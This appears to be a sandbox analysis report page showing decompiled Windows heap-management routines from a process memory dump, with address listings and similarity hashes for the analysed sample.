                                                                                                                                                                            										E1D83096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
                                                                                                                                                                            										 *_v8 =  *_v8 << 3;
                                                                                                                                                                            										L30:
                                                                                                                                                                            										_t247 = _v12;
                                                                                                                                                                            										 *((char*)(_t232 + 3)) = 0;
                                                                                                                                                                            										_t282 =  *((intOrPtr*)(_t247 + 0x18));
                                                                                                                                                                            										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
                                                                                                                                                                            											_t162 = (_t232 - _t247 >> 0x10) + 1;
                                                                                                                                                                            											_v32 = _t162;
                                                                                                                                                                            											__eflags = _t162 - 0xfe;
                                                                                                                                                                            											if(_t162 >= 0xfe) {
                                                                                                                                                                            												E1D8E5FED(3, _t282, _t232, _t247, 0, 0);
                                                                                                                                                                            												_t162 = _v32;
                                                                                                                                                                            											}
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t162 = 0;
                                                                                                                                                                            										}
                                                                                                                                                                            										 *((char*)(_t232 + 6)) = _t162;
                                                                                                                                                                            										_t164 =  *( *[fs:0x30] + 0x50);
                                                                                                                                                                            										if(_t164 != 0) {
                                                                                                                                                                            											__eflags =  *_t164;
                                                                                                                                                                            											if( *_t164 == 0) {
                                                                                                                                                                            												goto L33;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                                                                                            											L34:
                                                                                                                                                                            											if( *_t165 != 0) {
                                                                                                                                                                            												_t166 =  *[fs:0x30];
                                                                                                                                                                            												__eflags =  *(_t166 + 0x240) & 0x00000001;
                                                                                                                                                                            												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
                                                                                                                                                                            													goto L35;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags = E1D833C40();
                                                                                                                                                                            												if(__eflags == 0) {
                                                                                                                                                                            													_t180 = 0x7ffe0380;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                                                                                            												}
                                                                                                                                                                            												_t299 = _v8;
                                                                                                                                                                            												E1D8DF1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
                                                                                                                                                                            												L36:
                                                                                                                                                                            												_t168 =  *( *[fs:0x30] + 0x50);
                                                                                                                                                                            												if(_t168 != 0) {
                                                                                                                                                                            													__eflags =  *_t168;
                                                                                                                                                                            													if( *_t168 == 0) {
                                                                                                                                                                            														goto L37;
                                                                                                                                                                            													}
                                                                                                                                                                            													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                                                                                            													L38:
                                                                                                                                                                            													if( *_t169 != 0) {
                                                                                                                                                                            														__eflags = E1D833C40();
                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                            															_t171 = 0x7ffe038a;
                                                                                                                                                                            														} else {
                                                                                                                                                                            															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                                                                                            														}
                                                                                                                                                                            														E1D8DF1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
                                                                                                                                                                            													}
                                                                                                                                                                            													return _t232;
                                                                                                                                                                            												}
                                                                                                                                                                            												L37:
                                                                                                                                                                            												_t169 = 0x7ffe038a;
                                                                                                                                                                            												goto L38;
                                                                                                                                                                            											}
                                                                                                                                                                            											L35:
                                                                                                                                                                            											_t299 = _v8;
                                                                                                                                                                            											goto L36;
                                                                                                                                                                            										}
                                                                                                                                                                            										L33:
                                                                                                                                                                            										_t165 = 0x7ffe0380;
                                                                                                                                                                            										goto L34;
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t287 =  *(_t300 + 0xb8);
                                                                                                                                                                            									if(_t287 != 0) {
                                                                                                                                                                            										_t256 = _t150 >> 0xc;
                                                                                                                                                                            										__eflags = _t256 - _t287[1];
                                                                                                                                                                            										if(_t256 < _t287[1]) {
                                                                                                                                                                            											L79:
                                                                                                                                                                            											E1D83036A(_t300, _t287, 0, _t298, _t256, _t150);
                                                                                                                                                                            											goto L24;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											goto L75;
                                                                                                                                                                            										}
                                                                                                                                                                            										while(1) {
                                                                                                                                                                            											L75:
                                                                                                                                                                            											_t197 =  *_t287;
                                                                                                                                                                            											__eflags = _t197;
                                                                                                                                                                            											_v32 = _t197;
                                                                                                                                                                            											_t150 =  *(_t298 + 0x14);
                                                                                                                                                                            											if(_t197 == 0) {
                                                                                                                                                                            												break;
                                                                                                                                                                            											}
                                                                                                                                                                            											_t287 = _v32;
                                                                                                                                                                            											__eflags = _t256 - _t287[1];
                                                                                                                                                                            											if(_t256 >= _t287[1]) {
                                                                                                                                                                            												continue;
                                                                                                                                                                            											}
                                                                                                                                                                            											goto L79;
                                                                                                                                                                            										}
                                                                                                                                                                            										_t256 = _t287[1] - 1;
                                                                                                                                                                            										__eflags = _t287[1] - 1;
                                                                                                                                                                            										goto L79;
                                                                                                                                                                            									}
                                                                                                                                                                            									L24:
                                                                                                                                                                            									_t258 =  *((intOrPtr*)(_t298 + 4));
                                                                                                                                                                            									_t195 =  *_t298;
                                                                                                                                                                            									_t288 =  *_t258;
                                                                                                                                                                            									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
                                                                                                                                                                            										E1D8E5FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
                                                                                                                                                                            									} else {
                                                                                                                                                                            										 *_t258 = _t195;
                                                                                                                                                                            										 *((intOrPtr*)(_t195 + 4)) = _t258;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							L15:
                                                                                                                                                                            							_t146 = 0x7ffe0380;
                                                                                                                                                                            							goto L16;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t271 =  *_t215;
                                                                                                                                                                            						if(_t271 != 0) {
                                                                                                                                                                            							L63:
                                                                                                                                                                            							_t101 = _t298 - 8; // -8
                                                                                                                                                                            							_t232 = _t101;
                                                                                                                                                                            							__eflags = _v28 +  *_t276 - _t271;
                                                                                                                                                                            							if(__eflags <= 0) {
                                                                                                                                                                            								goto L11;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t220 =  *(_v24 + 4);
                                                                                                                                                                            							__eflags =  *(_v24 + 4);
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								E1D8E5FED(0x15, _t300, 0, _t220, _v32, _v28);
                                                                                                                                                                            								_t276 = _v8;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t143 = 0xc000012d;
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t271 =  *0x1d91432c; // 0x0
                                                                                                                                                                            						_v24 = 0x1d91432c;
                                                                                                                                                                            						if(_t271 != 0) {
                                                                                                                                                                            							goto L63;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L11;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}
























































                                                                                                                                                                            0x1d830689
                                                                                                                                                                            0x1d83068d
                                                                                                                                                                            0x1d830690
                                                                                                                                                                            0x1d830699
                                                                                                                                                                            0x1d8306a3
                                                                                                                                                                            0x1d830929
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d830929
                                                                                                                                                                            0x1d8306b0
                                                                                                                                                                            0x1d884e97
                                                                                                                                                                            0x1d884e99
                                                                                                                                                                            0x1d884e9f
                                                                                                                                                                            0x1d884ea5
                                                                                                                                                                            0x1d884ea9
                                                                                                                                                                            0x1d884eca
                                                                                                                                                                            0x1d884ecf
                                                                                                                                                                            0x1d884eab
                                                                                                                                                                            0x1d884ec0
                                                                                                                                                                            0x1d884ec5
                                                                                                                                                                            0x1d884ed7
                                                                                                                                                                            0x1d884edc
                                                                                                                                                                            0x1d884ee4
                                                                                                                                                                            0x1d884eeb
                                                                                                                                                                            0x1d884ef6
                                                                                                                                                                            0x1d884ef6
                                                                                                                                                                            0x1d884eeb
                                                                                                                                                                            0x1d884e99
                                                                                                                                                                            0x1d8306b6
                                                                                                                                                                            0x1d8306b9
                                                                                                                                                                            0x1d8306b9
                                                                                                                                                                            0x1d8306be
                                                                                                                                                                            0x1d830921
                                                                                                                                                                            0x1d8306c4
                                                                                                                                                                            0x1d8306c4
                                                                                                                                                                            0x1d8306c4
                                                                                                                                                                            0x1d8306ca
                                                                                                                                                                            0x1d8306d3
                                                                                                                                                                            0x1d8306d9
                                                                                                                                                                            0x1d8306dc
                                                                                                                                                                            0x1d884f0a
                                                                                                                                                                            0x1d884f10
                                                                                                                                                                            0x1d884f13
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8306e2
                                                                                                                                                                            0x1d8306e2
                                                                                                                                                                            0x1d8306f2
                                                                                                                                                                            0x1d830930
                                                                                                                                                                            0x1d830936
                                                                                                                                                                            0x1d830938
                                                                                                                                                                            0x1d83093e
                                                                                                                                                                            0x1d83093e
                                                                                                                                                                            0x1d830938
                                                                                                                                                                            0x1d8306ff
                                                                                                                                                                            0x1d884f1b
                                                                                                                                                                            0x1d884f1d
                                                                                                                                                                            0x1d884f22
                                                                                                                                                                            0x1d884f29
                                                                                                                                                                            0x1d884f2a
                                                                                                                                                                            0x1d884f2c
                                                                                                                                                                            0x1d884f2d
                                                                                                                                                                            0x1d884f2f
                                                                                                                                                                            0x1d884f34
                                                                                                                                                                            0x1d884f36
                                                                                                                                                                            0x1d884f39
                                                                                                                                                                            0x1d884f44
                                                                                                                                                                            0x1d884f4d
                                                                                                                                                                            0x1d884f4f
                                                                                                                                                                            0x1d884f54
                                                                                                                                                                            0x1d884f5b
                                                                                                                                                                            0x1d884f5b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d884f5b
                                                                                                                                                                            0x1d884f3b
                                                                                                                                                                            0x1d884f3d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d884f3f
                                                                                                                                                                            0x1d884f42
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d830705
                                                                                                                                                                            0x1d830705
                                                                                                                                                                            0x1d83070c
                                                                                                                                                                            0x1d83070e
                                                                                                                                                                            0x1d830724
                                                                                                                                                                            0x1d830727
                                                                                                                                                                            0x1d83072d
                                                                                                                                                                            0x1d830730
                                                                                                                                                                            0x1d830751
                                                                                                                                                                            0x1d830751
                                                                                                                                                                            0x1d830757
                                                                                                                                                                            0x1d83075c
                                                                                                                                                                            0x1d83075d
                                                                                                                                                                            0x1d83075f
                                                                                                                                                                            0x1d830760
                                                                                                                                                                            0x1d830762
                                                                                                                                                                            0x1d830767
                                                                                                                                                                            0x1d83076a
                                                                                                                                                                            0x1d83076a
                                                                                                                                                                            0x1d830770
                                                                                                                                                                            0x1d830772
                                                                                                                                                                            0x1d884f9f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d884f9f
                                                                                                                                                                            0x1d83077e
                                                                                                                                                                            0x1d830783
                                                                                                                                                                            0x1d884faa
                                                                                                                                                                            0x1d884fad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d884fbc
                                                                                                                                                                            0x1d83078e
                                                                                                                                                                            0x1d830791
                                                                                                                                                                            0x1d884fcc
                                                                                                                                                                            0x1d884fd3
                                                                                                                                                                            0x1d884fe2
                                                                                                                                                                            0x1d884fe2
                                                                                                                                                                            0x1d884fd3
                                                                                                                                                                            0x1d83079b
                                                                                                                                                                            0x1d8307a0
                                                                                                                                                                            0x1d8307a4
                                                                                                                                                                            0x1d8307b0
                                                                                                                                                                            0x1d8307b7
                                                                                                                                                                            0x1d884fec
                                                                                                                                                                            0x1d884ff1
                                                                                                                                                                            0x1d884ff1
                                                                                                                                                                            0x1d8307b7
                                                                                                                                                                            0x1d8307bd
                                                                                                                                                                            0x1d8307c1
                                                                                                                                                                            0x1d8307c5
                                                                                                                                                                            0x1d8307c8
                                                                                                                                                                            0x1d8307cb
                                                                                                                                                                            0x1d8307d0
                                                                                                                                                                            0x1d8307d3
                                                                                                                                                                            0x1d8307d3
                                                                                                                                                                            0x1d8307d6
                                                                                                                                                                            0x1d885008
                                                                                                                                                                            0x1d8307e4
                                                                                                                                                                            0x1d8307e4
                                                                                                                                                                            0x1d8307e6
                                                                                                                                                                            0x1d8307e6
                                                                                                                                                                            0x1d8307e9
                                                                                                                                                                            0x1d8307ee
                                                                                                                                                                            0x1d83081b
                                                                                                                                                                            0x1d83081b
                                                                                                                                                                            0x1d83081e
                                                                                                                                                                            0x1d830827
                                                                                                                                                                            0x1d83082d
                                                                                                                                                                            0x1d830833
                                                                                                                                                                            0x1d830839
                                                                                                                                                                            0x1d83083f
                                                                                                                                                                            0x1d830848
                                                                                                                                                                            0x1d8308fd
                                                                                                                                                                            0x1d830903
                                                                                                                                                                            0x1d830903
                                                                                                                                                                            0x1d83084e
                                                                                                                                                                            0x1d830851
                                                                                                                                                                            0x1d830855
                                                                                                                                                                            0x1d830945
                                                                                                                                                                            0x1d83094d
                                                                                                                                                                            0x1d830950
                                                                                                                                                                            0x1d830953
                                                                                                                                                                            0x1d830964
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d830964
                                                                                                                                                                            0x1d830955
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83085b
                                                                                                                                                                            0x1d83085b
                                                                                                                                                                            0x1d83086e
                                                                                                                                                                            0x1d830876
                                                                                                                                                                            0x1d830879
                                                                                                                                                                            0x1d830879
                                                                                                                                                                            0x1d83087c
                                                                                                                                                                            0x1d830880
                                                                                                                                                                            0x1d830885
                                                                                                                                                                            0x1d8308dd
                                                                                                                                                                            0x1d8308de
                                                                                                                                                                            0x1d8308e1
                                                                                                                                                                            0x1d8308e6
                                                                                                                                                                            0x1d8308f3
                                                                                                                                                                            0x1d8308f8
                                                                                                                                                                            0x1d8308f8
                                                                                                                                                                            0x1d830887
                                                                                                                                                                            0x1d830887
                                                                                                                                                                            0x1d830887
                                                                                                                                                                            0x1d830889
                                                                                                                                                                            0x1d830892
                                                                                                                                                                            0x1d830897
                                                                                                                                                                            0x1d88505d
                                                                                                                                                                            0x1d885060
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88506f
                                                                                                                                                                            0x1d8308a2
                                                                                                                                                                            0x1d8308a5
                                                                                                                                                                            0x1d885079
                                                                                                                                                                            0x1d88507f
                                                                                                                                                                            0x1d885086
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d885091
                                                                                                                                                                            0x1d885093
                                                                                                                                                                            0x1d8850a5
                                                                                                                                                                            0x1d885095
                                                                                                                                                                            0x1d88509e
                                                                                                                                                                            0x1d88509e
                                                                                                                                                                            0x1d8850af
                                                                                                                                                                            0x1d8850be
                                                                                                                                                                            0x1d8308ae
                                                                                                                                                                            0x1d8308b4
                                                                                                                                                                            0x1d8308b9
                                                                                                                                                                            0x1d8850c8
                                                                                                                                                                            0x1d8850cb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8850da
                                                                                                                                                                            0x1d8308c4
                                                                                                                                                                            0x1d8308c7
                                                                                                                                                                            0x1d8850e9
                                                                                                                                                                            0x1d8850eb
                                                                                                                                                                            0x1d8850fd
                                                                                                                                                                            0x1d8850ed
                                                                                                                                                                            0x1d8850f6
                                                                                                                                                                            0x1d8850f6
                                                                                                                                                                            0x1d885113
                                                                                                                                                                            0x1d885113
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8308cd
                                                                                                                                                                            0x1d8308bf
                                                                                                                                                                            0x1d8308bf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8308bf
                                                                                                                                                                            0x1d8308ab
                                                                                                                                                                            0x1d8308ab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8308ab
                                                                                                                                                                            0x1d83089d
                                                                                                                                                                            0x1d83089d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83089d
                                                                                                                                                                            0x1d8307f0
                                                                                                                                                                            0x1d8307f0
                                                                                                                                                                            0x1d8307f8
                                                                                                                                                                            0x1d885014
                                                                                                                                                                            0x1d885017
                                                                                                                                                                            0x1d88501a
                                                                                                                                                                            0x1d885036
                                                                                                                                                                            0x1d88503d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88501c
                                                                                                                                                                            0x1d88501c
                                                                                                                                                                            0x1d88501c
                                                                                                                                                                            0x1d88501e
                                                                                                                                                                            0x1d885020
                                                                                                                                                                            0x1d885023
                                                                                                                                                                            0x1d885026
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d885028
                                                                                                                                                                            0x1d88502b
                                                                                                                                                                            0x1d88502e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d885030
                                                                                                                                                                            0x1d885035
                                                                                                                                                                            0x1d885035
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d885035
                                                                                                                                                                            0x1d8307fe
                                                                                                                                                                            0x1d8307fe
                                                                                                                                                                            0x1d830801
                                                                                                                                                                            0x1d830803
                                                                                                                                                                            0x1d830808
                                                                                                                                                                            0x1d885053
                                                                                                                                                                            0x1d830816
                                                                                                                                                                            0x1d830816
                                                                                                                                                                            0x1d830818
                                                                                                                                                                            0x1d830818
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d830808
                                                                                                                                                                            0x1d8307ee
                                                                                                                                                                            0x1d830789
                                                                                                                                                                            0x1d830789
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d830789
                                                                                                                                                                            0x1d830732
                                                                                                                                                                            0x1d830736
                                                                                                                                                                            0x1d884f63
                                                                                                                                                                            0x1d884f66
                                                                                                                                                                            0x1d884f66
                                                                                                                                                                            0x1d884f6b
                                                                                                                                                                            0x1d884f6d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d884f76
                                                                                                                                                                            0x1d884f79
                                                                                                                                                                            0x1d884f7b
                                                                                                                                                                            0x1d884f8d
                                                                                                                                                                            0x1d884f92
                                                                                                                                                                            0x1d884f92
                                                                                                                                                                            0x1d884f95
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d884f95
                                                                                                                                                                            0x1d83073c
                                                                                                                                                                            0x1d830742
                                                                                                                                                                            0x1d83074b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83074b
                                                                                                                                                                            0x1d8306ff

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                            • API String ID: 0-4253913091
                                                                                                                                                                            • Opcode ID: 7b5a7cbc3e502146b176858e5ac583a7f5cf0f34ac2fe00ef9f3804edb603b8d
                                                                                                                                                                            • Instruction ID: f3ccfe5904fe879bd785880983e0bb1c98e02be8162ac44a14eb678c610c91ab
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b5a7cbc3e502146b176858e5ac583a7f5cf0f34ac2fe00ef9f3804edb603b8d
                                                                                                                                                                            • Instruction Fuzzy Hash: 57F1DF75A00656EFDB05CF68C880B6AB7B5FF44700F1081A8E5199B396D734F982CFA2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                            			E1D81F8B0(signed int __edx, signed int _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				void* _v28;
                                                                                                                                                                            				void* _v54;
                                                                                                                                                                            				void* _v60;
                                                                                                                                                                            				void* _v64;
                                                                                                                                                                            				char _v88;
                                                                                                                                                                            				void* _v90;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				char _v96;
                                                                                                                                                                            				void* _v100;
                                                                                                                                                                            				void* _v104;
                                                                                                                                                                            				void* _v108;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t62;
                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                            				intOrPtr _t73;
                                                                                                                                                                            				signed int* _t86;
                                                                                                                                                                            				signed int _t87;
                                                                                                                                                                            				signed int _t91;
                                                                                                                                                                            				char* _t92;
                                                                                                                                                                            				char _t96;
                                                                                                                                                                            				void* _t102;
                                                                                                                                                                            				signed int* _t105;
                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                            				void* _t107;
                                                                                                                                                                            				signed int* _t110;
                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                            				char* _t118;
                                                                                                                                                                            				signed int _t121;
                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                            				void* _t128;
                                                                                                                                                                            				void* _t129;
                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                            				void* _t139;
                                                                                                                                                                            				signed int _t161;
                                                                                                                                                                            				void* _t162;
                                                                                                                                                                            				void* _t164;
                                                                                                                                                                            				intOrPtr* _t166;
                                                                                                                                                                            				void* _t169;
                                                                                                                                                                            				signed int* _t170;
                                                                                                                                                                            				signed int* _t171;
                                                                                                                                                                            				signed int _t174;
                                                                                                                                                                            				signed int _t176;
                                                                                                                                                                            
                                                                                                                                                                            				_t158 = __edx;
                                                                                                                                                                            				_t176 = (_t174 & 0xfffffff8) - 0x64;
                                                                                                                                                                            				_v8 =  *0x1d91b370 ^ _t176;
                                                                                                                                                                            				_push(_t128);
                                                                                                                                                                            				_t161 = _a4;
                                                                                                                                                                            				if(_t161 == 0) {
                                                                                                                                                                            					__eflags =  *0x1d916960 - 2;
                                                                                                                                                                            					if( *0x1d916960 >= 2) {
                                                                                                                                                                            						_t64 =  *[fs:0x30];
                                                                                                                                                                            						__eflags =  *(_t64 + 0xc);
                                                                                                                                                                            						if( *(_t64 + 0xc) == 0) {
                                                                                                                                                                            							_push("HEAP: ");
                                                                                                                                                                            							E1D81B910();
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E1D81B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                            						}
                                                                                                                                                                            						_push("(HeapHandle != NULL)");
                                                                                                                                                                            						E1D81B910();
                                                                                                                                                                            						__eflags =  *0x1d915da8;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							_t139 = 2;
                                                                                                                                                                            							E1D8DFC95(_t128, _t139, _t161, __eflags);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					L26:
                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                            					L27:
                                                                                                                                                                            					_pop(_t162);
                                                                                                                                                                            					_pop(_t164);
                                                                                                                                                                            					_pop(_t129);
                                                                                                                                                                            					return E1D864B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
                                                                                                                                                                            					_t73 =  *[fs:0x30];
                                                                                                                                                                            					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
                                                                                                                                                                            					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
                                                                                                                                                                            						L30:
                                                                                                                                                                            						_t62 = _t161;
                                                                                                                                                                            						goto L27;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t141 =  *(_t161 + 0x10);
                                                                                                                                                                            					__eflags =  *(_t161 + 0x10);
                                                                                                                                                                            					if( *(_t161 + 0x10) != 0) {
                                                                                                                                                                            						_t158 = _t161;
                                                                                                                                                                            						E1D8C78DE(_t141, _t161, 0, 8, 0);
                                                                                                                                                                            					}
                                                                                                                                                                            					E1D81FD8E(_t161, _t158);
                                                                                                                                                                            					E1D8E02EC(_t161);
                                                                                                                                                                            					_t158 = 1;
                                                                                                                                                                            					E1D81918A(_t161, 1, 0, 0);
                                                                                                                                                                            					E1D8E8E26(_t161);
                                                                                                                                                                            					goto L26;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
                                                                                                                                                                            					_t166 =  *0x1d913758; // 0x0
                                                                                                                                                                            					 *0x1d9191e0(_t161);
                                                                                                                                                                            					_t62 =  *_t166();
                                                                                                                                                                            					goto L27;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t7 = _t161 + 0x58; // 0x8953046a
                                                                                                                                                                            				_t147 =  *_t7;
                                                                                                                                                                            				if( *_t7 != 0) {
                                                                                                                                                                            					_t158 = _t161;
                                                                                                                                                                            					E1D8C78DE(_t147, _t161, 0, 8, 0);
                                                                                                                                                                            				}
                                                                                                                                                                            				E1D81FD8E(_t161, _t158);
                                                                                                                                                                            				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
                                                                                                                                                                            					__eflags =  *(_t161 + 0x40) & 0x10000000;
                                                                                                                                                                            					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t127 = E1D8CF85F(_t161);
                                                                                                                                                                            					__eflags = _t127;
                                                                                                                                                                            					if(_t127 == 0) {
                                                                                                                                                                            						goto L30;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
                                                                                                                                                                            						goto L30;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						E1D82FED0(0x1d914800);
                                                                                                                                                                            						E1D81FAEC(_t161);
                                                                                                                                                                            						_push(0x1d914800);
                                                                                                                                                                            						E1D82E740(_t161);
                                                                                                                                                                            						_t86 = _t161 + 0x9c;
                                                                                                                                                                            						_t131 =  *_t86;
                                                                                                                                                                            						while(_t86 != _t131) {
                                                                                                                                                                            							_t87 = _t131;
                                                                                                                                                                            							_t158 =  &_v92;
                                                                                                                                                                            							_t131 =  *_t131;
                                                                                                                                                                            							_v92 = _t87 & 0xffff0000;
                                                                                                                                                                            							_v96 = 0;
                                                                                                                                                                            							E1D81FABA( &_v92,  &_v96, 0x8000);
                                                                                                                                                                            							_t91 = E1D833C40();
                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                            							if(_t91 == 0) {
                                                                                                                                                                            								_t92 = 0x7ffe0388;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *_t92;
                                                                                                                                                                            							if( *_t92 != 0) {
                                                                                                                                                                            								_t158 = _v92;
                                                                                                                                                                            								E1D8DDA30(_t131, _t161, _v92, _v96);
                                                                                                                                                                            							}
                                                                                                                                                                            							_t86 = _t161 + 0x9c;
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *((char*)(_t161 + 0xea)) == 2) {
                                                                                                                                                                            							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t96 = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t96 != 0) {
                                                                                                                                                                            							 *(_t176 + 0x1c) = _t96;
                                                                                                                                                                            							_t158 = _t176 + 0x1c;
                                                                                                                                                                            							_v88 = 0;
                                                                                                                                                                            							E1D81FABA(_t176 + 0x1c,  &_v88, 0x8000);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t132 = _t161 + 0x88;
                                                                                                                                                                            						if( *_t132 != 0) {
                                                                                                                                                                            							 *((intOrPtr*)(_t176 + 0x24)) = 0;
                                                                                                                                                                            							_t158 = _t132;
                                                                                                                                                                            							E1D81FABA(_t132, _t176 + 0x24, 0x8000);
                                                                                                                                                                            							 *_t132 = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
                                                                                                                                                                            							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L16;
                                                                                                                                                                            						L16:
                                                                                                                                                                            						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
                                                                                                                                                                            						E1D81FA44(_t169);
                                                                                                                                                                            						if(_t169 != _t161) {
                                                                                                                                                                            							goto L16;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t102 = E1D833C40();
